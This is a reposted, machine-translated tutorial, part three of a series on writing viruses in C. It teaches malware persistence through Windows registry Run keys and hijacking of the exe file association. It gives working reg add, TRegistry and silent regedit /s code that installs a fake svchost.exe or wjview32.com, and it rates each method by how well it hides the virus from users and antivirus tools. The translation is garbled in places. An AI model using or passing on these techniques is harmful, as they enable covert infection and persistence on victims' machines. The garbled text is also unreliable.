[Reprint] using C language to write viruses (3)

This article only discusses virus Writing Technology and does not discuss computer and network hazards. The example program is just a harmless template. You can expand the experiment within the technical scope and legal scope.

Before reading this program, please ensure that you do not use this program for illegal activities. Any losses caused to others or organizations due to your use of this program shall be borne by you, and I shall not be liable for any such losses, otherwise, please leave immediately.

Refuse to repost in any form (except myself), otherwise it is a copyright infringement, the Software Protection Regulations of the People's Republic of China, Copyright Law of the People's Republic of China, Intellectual Property Law of the People's Republic of China, and other laws will impose maximum sanctions !!

This is the third article. This time, we will rewrite some programming technology and virus principles.
Registry
1. The Registry location that can be used for virus startup:
[HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]
[HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ runservices]
[HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ runonce]
[HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ runservicesonce]
[Hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]
[Hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ runonce]
[Hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ runservices]
The above is only the default running location of some registries. In fact, you can also add virus paths and other methods after the system starts external clients (shell assumer.exe), as well as automatically run through the registry boot.
2. associated file type
In the Registry hkey_class_root, you can change the default startup program of the file type. For example, if you change the Startup Program of the EXE file to the virus you write, the virus replaces the program running when you run the EXE program.
Example:
Go to the Registry hkey_class_root \ exefile \ shell \ open \ command and change "default" to c: \ windows \ svchost.exe "% 1" % *. Then, when the .exe file is run, only C: \ windows \ svchost.exe

3. How to modify the registry:
(1) Use the reg command to add and modify the registry:
To use the reg command, enter REG /? And use Windows Command help to view
Main format:
Reg operation [parameter list]

Operation [query | add | Delete | copy |
Save | load | unload | restore |
Compare | export | import]
For example, add the svchost key value to HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run. The key value is C: \ WINDOWS \ SYSTEM \ svchost.exe.

Reg Add "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run"/V svchost/d c: \ WINDOWS \ SYSTEM \ svchost.exe/F

There are two main methods to call the reg command: one is to use the system function in the C language, the other is to use the spawn class function in the C language (such as the function spawnl ). For details about how to use system and spawnl, see other materials. Here is only an example:

For example, use the system function to add the svchost key value to HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run using the reg command. The key value is C: \ WINDOWS \ SYSTEM \ svchost.exe

System ("Reg add \" HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ "/V svchost/d c: \ Windows \ System \ svchost.exe/F ");

Comment and Conclusion: Using the reg command to add a registry can directly call the system command (Tool) to modify the Registry. If it is blocked by anti-virus software, only the modification operation is sent from C: \ windows \ system32 \ reg.exe makes it difficult to find viruses. However, because the reg command is a console command, a black Console appears when calling it, which indicates that the virus is detected by infected users and is not conducive to hiding the virus.

(2) Use windowsapi to add and modify the Registry
Windowsapi provides about 25 functions. He provides the following functions for reading, writing, and deleting the registry, and opening the registry and key values:
Regclosekey
Regconnectregistry
Regcreatekey
Regcreatekeyex
Regdeletekey
Regdeletevale
Regenumkey
Regflushkey
Reggetkeysecurity (not applicable to Windows9x)
Regloadkey
Regpolicychangekeyvalue (not applicable to Windows9x)
Regopenkey
Regopenkeyex
Regqueryinfokey
Regqueryvalue
Regqueryvalueex
Regreplacekey
Regrestorekey (not applicable to Windows9x)
Regsavekey
Regsetkeysecurity (not applicable to Windows9x)
Regsetvalue
Regsetvalueex
Regunloadkey
And so on. The use of the function requires the windows. h file to be called under the 32-bit C compiler. The same as in (1). For details about how to use the function, see other materials. Here is only an example.
For example, you can use Windows API to add a key value named svchost to HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run. The key value is C: \ WINDOWS \ SYSTEM \ svchost.exe.

Tregistry * Registry;
Registry = new Tregistry ();
Registry-> rootkey = HKEY_LOCAL_MACHINE;
Registry-> openkey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", false );
Registry-> writestring ("svchost", "C: \ Windows \ System \ svchost.exe"); writestring ()
Registry-> closekey ();

Comment and Conclusion: Using windowsapi to add a registry can directly modify the Registry without calling system commands (tools, if it is intercepted by anti-virus software, the path of the virus file from which the modification operation comes is displayed, making the virus easy to find. However, since Windows API can be modified quietly, it is not displayed on the front-end. Therefore, if it is not blocked during the call, it is difficult for infected users to detect it, facilitating virus hiding.
(3) Use Regedit to add and modify the Registry
Regedit is the Registry Editor, but it actually has a/S parameter. If you call the Regedit/s registry file, you can modify the Registry without a prompt in the background. You also need to use the spawnl function to call it.

For example, use the spawnl function to call regedit and add the wjview32 key value to HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run. The key value is c: \ windows \ wjview32.com/s.
Char * regadd = {"regedit4 \ n [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run] \ n \" wjview32 \ "= \" C: \\\ windows \\\\ wjview32.com/s \""};
File * output;
If (output = fopen ("$", "W "))! = NULL)
{
Fprintf (output, regadd );
Fclose (output );
Spawnl (1, "C: \ WINDOWS \ regedit.exe", "/S $", null );
}
Comments and summary: using the spawnl Function + Regedit can have the advantages of both windowsapi and Reg methods. If the registry is blocked by anti-virus software, the modification operation is from c: \ windows \ regedit.exe, this makes it difficult to find the virus path, facilitating virus hiding. Regedit can be modified quietly without any display on the front-end. Therefore, if it is not blocked during the call, it is difficult for infected users to detect it, helping to hide viruses.